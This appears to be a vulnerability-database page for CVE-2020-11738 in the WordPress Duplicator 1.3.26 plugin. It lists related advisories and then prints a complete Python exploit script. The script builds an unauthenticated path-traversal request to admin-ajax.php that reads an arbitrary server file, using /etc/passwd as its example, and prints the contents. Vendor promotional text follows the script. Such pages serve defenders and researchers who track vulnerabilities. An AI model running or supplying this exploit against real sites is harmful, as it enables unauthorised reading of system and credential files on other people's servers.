| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
| Wordpress Duplicator 1.3.26 Plugin - Unauthenticated Arbitrary File Read Exploit | 18 Dec 202000:00 | – | zdt | |
| Wordpress Duplicator 1.3.26 Plugin - Unauthenticated Arbitrary File Read Exploit | 18 Oct 202100:00 | – | zdt | |
| CVE-2020-11738 | 13 Apr 202000:00 | – | attackerkb | |
| CVE-2020-11738 | 18 Dec 202022:18 | – | circl | |
| WordPress Snap Creek Duplicator Plugin File Download Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| WordPress Snap Creek Duplicator and Duplicator Pro Path Traversal Vulnerability | 14 Apr 202000:00 | – | cnvd | |
| CVE-2020-11738 | 13 Apr 202021:20 | – | cve | |
| CVE-2020-11738 | 13 Apr 202021:20 | – | cvelist | |
| WordPress Duplicator < 1.3.28 Directory Traversal | 8 Mar 202100:00 | – | dsquare | |
| Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit) | 18 Dec 202000:00 | – | exploitdb |
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738
import requests as re
import sys
if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()
arg = sys.argv[1]
file = sys.argv[2]
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
output = re.get(url = URL)
print(output.text)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation